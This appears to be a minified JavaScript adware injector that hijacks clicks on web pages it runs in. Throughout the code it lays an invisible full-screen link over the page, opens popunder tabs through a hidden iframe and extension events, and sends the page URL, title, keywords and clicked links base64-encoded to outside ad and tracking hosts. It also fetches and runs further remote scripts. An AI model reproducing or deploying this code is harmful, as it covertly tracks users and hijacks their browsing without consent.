_GPL.j(function(h,b,ua,x,n,f,y,Ra,Sa,Fb,da,z,pb,va,w,wa,l,Ta,ha,Ua,s,p,Gb,q,qb,xa){function O(a){a=da.userAgent.match(pb(a+"[/ ](\\d+)","i"));return(a&&a[1])|0}function ya(a){var g=!a||!a.type;g||(a.cancelBubble=!0,a.preventDefault&&a.preventDefault(),a.returnValue=!1,a.stopImmediatePropagation&&a.stopImmediatePropagation(),a.stopPropagation&&a.stopPropagation());return g}function P(){Va(k,ha,P);rb(function(a,g){c=a;Q||(Q=!0,c!=za&&K&&(c+="&fo=1"),Wa(),sb(),tb(),Xa(),Aa=+new n,B(k,ha,Ya),Za=va(function(){36E5<
+new n-Aa&&Y(!1)},5E3))})}function Ya(a){Aa=+new n;Q&&(t&&t.remove(),x(Ba),Ca=a.target||a.srcElement,Ba=w(Wa,50))}function Y(a){Q&&(h("iframe").off("mouseover",$a),x(Ba),t&&t.remove(),R&&R.remove(),Q=!1,ua(Za),ub(),Va(k,ha,Ya),c=void 0,E=A="",Da=!1,a||B(k,ha,P),w(P,1E3*Math.max(L,F)))}function B(a,g,b){if(l[Ta]){var e=ia();try{return e.call(a,g,b,!0)}catch(f){a[Ta](g,b,!0)}}else a.attachEvent("on"+g,b,!0)}function tb(){ea=!0;b.ah&&b.ah(G,S);h("*").add(l).each(function(a,b){b[ja]||B(b,G,S)});ab||(ab=
!0,h("*").add(l).each(function(a,b){b[ja]||(B(b,"mousedown",T),B(b,"mouseup",T),B(b,"click",T))}),b.ah&&(b.ah("mousedown",T),b.ah("mouseup",T),b.ah("click",T)));h("iframe").each(function(a,b){try{B(b.contentWindow,G,S)}catch(g){}});bb=va(function(){h("iframe").each(function(a,b){b[cb]||(b[cb]=1,h(b).mouseover($a))})},100);if(fa)try{b.log("Attempting to pop from extension to: "+c);var a="ld893_";A&&(a+="_"+f(A),E&&(a+=","+E),a+="_");var a=a+("_"+H()),g=b.proto+b.baseCDN+"/pwn.html?u="+f(c)+"&n="+a+
"&r=";"h"!=fa||Z?"w"!=fa||Z||(Z=!0,Ea(l,"openThatTabBitch",{url:g,isUnder:!1,attr:"z7b85_91c4"}),w(function(){Z=!1},100)):(Z=!0,Ea(k,"createNewTab",{url:g,focused:"true"}),Ea(k.documentElement,"createNewTab",{url:g,focused:"true"}),w(function(){Z=!1},100));var d=va(function(){k.documentElement.getAttribute("z7b85_91c4")&&(ua(d),Y(!0),db(),k.documentElement.removeAttribute("z7b85_91c4"))},50)}catch(e){}}function Ea(a,b,d){if(k.createEvent){var e=k.createEvent("CustomEvent");e.initCustomEvent(b,!1,
!1,d);a.dispatchEvent(e)}else e=k.createEventObject(),e.detail=d,e.realType=b,a.fireEvent("ondataavailable",e)}function vb(){if(O("Chrome")){for(var a=0;a<da.plugins.length;a++)if("Widevine Content Decryption Module"==da.plugins[a].name)return!1;return!0}return!1}function Wa(){if(Q){t&&t.remove();if(Ca)for(var a=Ca;a;){if(a[ja])return;a=a.parentNode}t=h('<a style="z-index:999999999999999;padding:0;margin:0;cursor:default;opacity:0;position:fixed;top:0;left:0;background:transparent;width:100%;height:100%;">&nbsp;</a>');
a="ld893_";A&&(a+="_"+A,E&&(a+=","+E),a+="_");a+="_"+H();t.attr("target",a);t.attr("href",c);B(t[0],"mousedown",ya);B(t[0],"mouseup",ya);B(t[0],"click",S);t.appendTo(k.body)}}function sb(){R||(R=h('<div style="z-index:999999999999999;cursor:pointer;display:none;position:absolute;background:transparent;">&nbsp;</div>').appendTo("body"),R.mouseout(function(){R.hide()}))}function $a(a){var b=h(a.target),d=b.offset();d.width=b.outerWidth();d.height=b.outerHeight();d.display="block";R.css(d);a.stopPropagation()}
function wb(a){if(c!=za){a=a.target||a.srcElement;for(var g="";a;){aa||(aa=a.tagName);if("A"==a.tagName&&a.href&&a.protocol.toLowerCase().match(/^http/)&&-1===a.href.indexOf(U)){g=a.protocol+"//"+a.host+a.pathname+a.search+a.hash;break}a=a.parentNode}if(!c)return!1;g&&-1==g.indexOf(U)&&(c+="&t="+f(g.substring(0,Math.max(0,1500-c.length))));c+="&rt="+(+new n-eb);aa&&(c+="&data_tag="+f(aa));"/"!=y.pathname&&(c+="&mk="+f(b.B64.encode(Fa().substring(0,Math.max(0,1500-c.length)))));c+=fb?"&data_sid="+
f(fb):""}b.log("Popping to: "+c);a="ld893_";A&&(a+="_"+f(A),E&&(a+=","+E),a+="_");a+="_"+H();g=a;ba.parentNode||(Ga=gb());if(da.userAgent.match(/\bEdge\/\d+/i))a=Ga(c,g);else if(a=Ga("",1749==r?g:"_blank"))a.name=g,0.02>Math.random()?(g=""+c,-1<c.indexOf(U)&&(g="http://"+U+"/pclk?c="+f(A)+"&crl="+f(c)),a.location.href=g):a.location.href=c;return a}function Fa(){function a(a){return a.toLowerCase().replace(/[.,!?]/g," ").split(" ")}var b=[];h("title").length&&(b=b.concat(a(h("title").text())));h('meta[property="og:title"],meta[property="og:description"],meta[name="description"],meta[name="keywords"]').each(function(){var d=
h.trim(h(this).attr("content"));d&&d.match(/^\s*[a-zA-Z0-9]/)&&(b=b.concat(a(d)))});return h.trim(function(a){var b=[];h.each(a,function(a,g){-1==h.inArray(g,b)&&b.push(g)});return b}(b).join(",").replace(/([,]+)/g,",").replace(/\s+/g," "))}function hb(a,g){a=(a||y.href).substr(0,1500);var d="/"!=y.pathname?Fa():"";a=a.replace(/:/g,"%3A");var d=d.replace(/:/g,"%3A").substring(0,Math.max(0,1500-a.length)),e=b.getSubId?"&subid="+b.getSubId(ka):"",d=f(b.B64.encode(a+"::z-"+r+"-"+ib+"::"+d)),c="&cb="+
(g||Ha),c=c+("&data_fr="+(jb(C)?"false":"true")),c=c+("&data_proto="+f(y.protocol));K&&(c+="&fo=1&data_fo=1");return b.proto+U+(I?"/dpops":"/pops")+"?c="+d+"&a=1&ch="+f(ga)+e+c}function Va(a,b,d){if(l[Ua])a[Ua](b,d,!1);else a.detachEvent("on"+b,d)}function ub(){ea=!1;b.rh&&b.rh(G,S);h("*").add(l).off(G,S);h("iframe").each(function(a,b){try{h(b.contentWindow).off(G,S)}catch(d){}});ua(bb)}function xb(a){a=a||l.event||{};if(fa&&k.documentElement.getAttribute("z7b85_91c4"))return!0;for(a=a.target||a.srcElement;a;){if(a[ja])return!0;
a=a.parentNode}return!1}function J(a,g){a=z(a,10);isNaN(a)&&(a=z(la&&la.getItem(g)||b.gc(g,10),10)||0);return a}function jb(a){return(new n(1E3*(a||0))).toDateString()==(new n).toDateString()}function ma(){C|=0;u|=0;M|=0;var a=H(),b=u&&!jb(C);b&&(u=0,v.set(q,u));var d=!V||a-C>=L&&u<V,a=a-M>=F;return!m&&b||d&&a}function S(a){a=a||l.event;if(!xb(a)){var g=ea&&(I||yb()),d=g&&wb(a);if(d&&!d.closed)return Y(!0),db(),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_success&d="+f(b.gd())+"&xr="+(m?"1":
"0")+"&cid="+b.vars.cid+"&pid="+r+"&r="+999999999*Math.random(),na&&x(na),oa&&x(oa),pa=!0,T(a);d&&d.closed?oa||(oa=w(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popclose&u="+f(c)+"&location="+f(y.hostname)+"&pid="+r+"&tag="+f(aa||"")+"&r="+999999999*Math.random()},1E3)):g&&(na||(na=w(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfail&u="+f(c)+"&location="+f(y.hostname)+"&pid="+r+"&tag="+f(aa||"")+"&r="+999999999*Math.random()},1E3)))}}function yb(){if(v.swf){C=
J(v.get(s),s);316808>Ia.score&&(u=J(v.get(q),q));var a=Ja(v.get(p));M=J(a[W],p)}return ma()}function Xa(){!v.swf&&Q&&v.get([s,q,p],function(a){a=a.v;C=J(a[s],s);316808>Ia.score&&(u=J(a[q],q));a=Ja(a[p]);M=J(a[W],p);w(Xa,1E3)})}function H(){return Ra(new n/1E3)}function kb(a,b,d){v.set(a,d);d=H();la&&la.setItem(a,d);b=z(b,10);var e=new n;e.setSeconds(e.getSeconds()+b);k.cookie=a+"="+d+";expires="+e.toUTCString()+";path=/;domain="+W}function db(){var a=H();kb(s,L,a);v.set(qb,a);C=a;v.set(q,++u);F&&
kb(p,F,qa+(qa&&",")+W+":"+a)}function Ja(a){var b={},d=H(),e=[];a=(a||"").split(",");if(a.length){for(var c=0;c<a.length;++c){var f=a[c].split(":"),h=z(f[1],10);d-h<F&&(b[f[0]]=h,e.push(f[0]+":"+h))}qa=e.join(",");v.set(p,qa)}return b}function Ka(){return I||ma()||m?1:H()-(z(M,10)||0)<F?Infinity:u>=V?"US"==b.vars.cid?149058:-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?88620:59858:"US"==b.vars.cid?47432:-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?59858:49928}function zb(a){"US"==b.vars.cid?
La(a,47432,149058):-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?La(a,59858,88620):La(a,49928,59858);return ma()}function La(a,b,d){a>=b&&(L=0,a>=d&&u>=V&&(u=Sa(0,V-1)))}function rb(a){!function d(){v.get(["frt","_GPL_oo_z7b85",s,p,q,xa],function(e){if(e.v.frt){if("1750"==r){var c=z(e.v._GPL_oo_z7b85,10)||0;if(86400>Ra(new n/1E3)-c)return}Ab.getAttribute("data-openThatTabBitch")&&"t3"==b.vars.wptg&&(c=["wp_t3_c","wp_t3_t"],N=e.v[xa],N&&-1!=c.indexOf(N)||(N=c[Math.floor(Math.random()*c.length)],
v.set(xa,N)),"wp_t3_t"==N&&(fa="w"));lb||(lb=!0,b.pc(function(){mb?mb=!1:ea||(Ma=!1,Y(),P())}));l[Ha]=function(b){Bb(b,a)};c=H();C=J(e.v[s],s);u=J(e.v[q],q);e=Ja(e.v[p]);M=J(e[W],p);I||ma()?(e=Ka(),Na=+new n,b.insertJS(hb()+"&ms="+e+"&r="+c),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_req&ms="+e+"&d="+f(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+r+"&r="+999999999*Math.random(),x(ra),ra=w(function(){x(ra);if(!K&&!m&&1735!=r){var a=Ka(),b="http://clkmon.com/adServe/banners?pid=14442&cid="+
ib+"&action=r&q=",c="/"!=y.pathname?Fa():"",b=b+f(c.substring(0,Math.max(0,1500-b.length)));l[Ha]({url:b,score:a});(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfallback&reason="+f("time")+"&pid="+r+"&u="+f(y.hostname)+"&r="+999999999*Math.random()}},15E3)):(e=Ka(),b.log("minScoreNeeded: "+e),Infinity>e&&!Ma&&!m?(Na=+new n,b.insertJS(hb()+"&ms="+e+"&r="+c),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_req&ms="+e+"&d="+f(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+r+"&r="+
999999999*Math.random(),Ma=!0):Oa(),I||K||(x(Pa),Pa=w(d,1E3*(5+Sa(c,C+L,M+F)-c))))}})}()}function ia(){if(!ia.v){var a=k.createElement("iframe");try{k.body.appendChild(a),ia.v=a.contentWindow.Element.prototype.addEventListener,k.body.removeChild(a)}catch(b){a&&k.body.removeChild(a)}}return ia.v||Element.prototype.addEventListener}function gb(){ba=k.createElement("iframe");ba.style.display="none";ba.style.visibility="hidden";k.body.appendChild(ba);return ba.contentWindow.open}function T(a){pa&&!Qa&&
(Qa=w(function(){Qa=wa;pa=!1},100));a=a||l.event||{};return pa||a.type&&a.type!=G&&ea?ya(a):!0}function Oa(){Da||K||(Da=!0,b.insertJS(b.proto+b.baseCDN+"/items/z7b85/js/z7b85.js","z7b85bm"))}function sa(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_nobid&d="+f(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+r+"&r="+999999999*Math.random()}function Bb(a,c){x(ra);var d=+new n-Na;E=A="";ca&&ca.score&&(!a||z(a.score,10)<z(ca.score,10))&&(a=ca,ca=wa);if(a){if(I){if(!a.url&&!a.retry){if(m){sa();
return}a.retry=L}if(a.retry){x(ta);ta=w(function(){Y(!0);P()},1E3*z(a.retry+1,10));sa();return}}a.crid&&(E=a.crid);if(I&&a.url&&!a.cid){var e=a.url.match(/[?&]c=([^&]+)/);e&&e[1]&&(a.cid=e[1])}a.cid&&(A=a.cid,a.url&&I||(a.url="http://"+U+"/click?c="+f(A)));a.url&&(a.url+=b.getSubId?"&subid="+b.getSubId(ka):"",a.url+=N?"&data_test="+f(N):"",a.url+="&data_fb="+(vb()?"yes":"no"),a.url+="&data_rtt="+d,a.url+="&data_proto="+f(y.protocol),a.url+="&data_ic="+(nb?"true":"false"),K&&(a.url+="&data_fo=1"),
a.url+="&data_ss="+(screen.availHeight||0)+"x"+(screen.availWidth||0));m&&!a.url&&(a.url=za,a.cid="xr");d=z(a.score,10);e=!a.mp;if(!e&&25<=100*parseFloat(a.mp)&&(e=!0,!K)){b.item_vars.z7b85_b=a;Oa();return}e=e&&(I||0<d&&zb(d));m||e?(eb=+new n,x(Pa),a.url&&a.expires&&(x(ta),ta=w(function(){Y(!0);P()},1E3*z(a.expires,10))),Ia={score:d,now:new n/1},c(a.url,d),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_bid&d="+f(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+r+"&r="+999999999*Math.random()):
(sa(),Oa())}else sa()}var v=b.items.e6a00,k=l.document,Ab=k.body,la=l.localStorage,Cb=O("chrome"),Db=O("firefox");O("opera");var Eb=O("safari");O("webkit");var ga=b.item_vars["22555_ch"]||b.item_vars.ch||"",L,C,M,X=b.dt(),X=X&&X.inherited&&X.inherited.t||[],m="x"==ga||-1<X.indexOf("adult")||0==X.length&&0<h('meta[content="RTA-5042-1996-1400-1577-RTA"]').length;m&&(-1==X.indexOf("adult_block")?ga="x":(ga="x-issue",m=!1));var F,ka="z7b85",U=b.gsd&&b.gsd(ka)||"s.hklmm.com",Q=!1,Za,Aa,ea=!1,W=b.gd(),
c,eb=0,Na=0,ta,qa="",u=0,V,Ia={},A="",E="",Pa,Ma=!1,N,na,oa,ra,aa;da.userAgent.match(/Trident.*rv[ :]*11\./);var G="click";if(Cb||Eb)G="mousedown";else if(Db||k.all||O("trident"))G="mouseup";var ob=b.zoneid(ka,!0).split("_"),ib=ob[0],r=ob[1]||b.vars.pid,fb=b.vars.systemid,za="http://secure.xsrving.com/display?size=800x600&ch="+f(ga)+"&referer="+f(W),fa=!1,Z=!1,Ha=b.rs(20),R,cb=b.rs(12),t,Ba,bb,nb=function(){try{return l[(l.btoa||function(a){return a})(y.hostname+"::"+(new n).toDateString())]===y.protocol}catch(a){return!1}}(),
Qa,ja="91c4",lb=!1,mb=!0,ba,Ga=gb(),pa=!1,ab=!1,I=!1,K=0<h("#z7b85bm").length,Da=!1,ca,Ca;K&&(b.ri("z7b85bm"),s+="_bm",p+="_bm",q+="_bm",U="feed.k1wmm.com",(ca=b.item_vars.z7b85_b)&&(b.item_vars.z7b85_b=wa));1797==r&&"GB"==b.vars.cid||l.name.match(/^_odctxdsp/)||"facebook.com"==W||(nb?(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=idlecrawler&d="+f(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+r+"&r="+999999999*Math.random():(m?(V=L=0,F=180,s+="_xr",p+="_xr",q+="_xr"):(L=360,V=4,F=360),
P()))},_GPL,clearInterval,clearTimeout,Date,encodeURIComponent,location,Math.floor,Math.max,Math.random,navigator,parseInt,RegExp,setInterval,setTimeout,void 0,window,"addEventListener","mousemove","removeEventListener","ld893_pop_g","ld893_pop_s","ld893_s","ld893_pop_gs","ld893_spopd","z7b85_test");
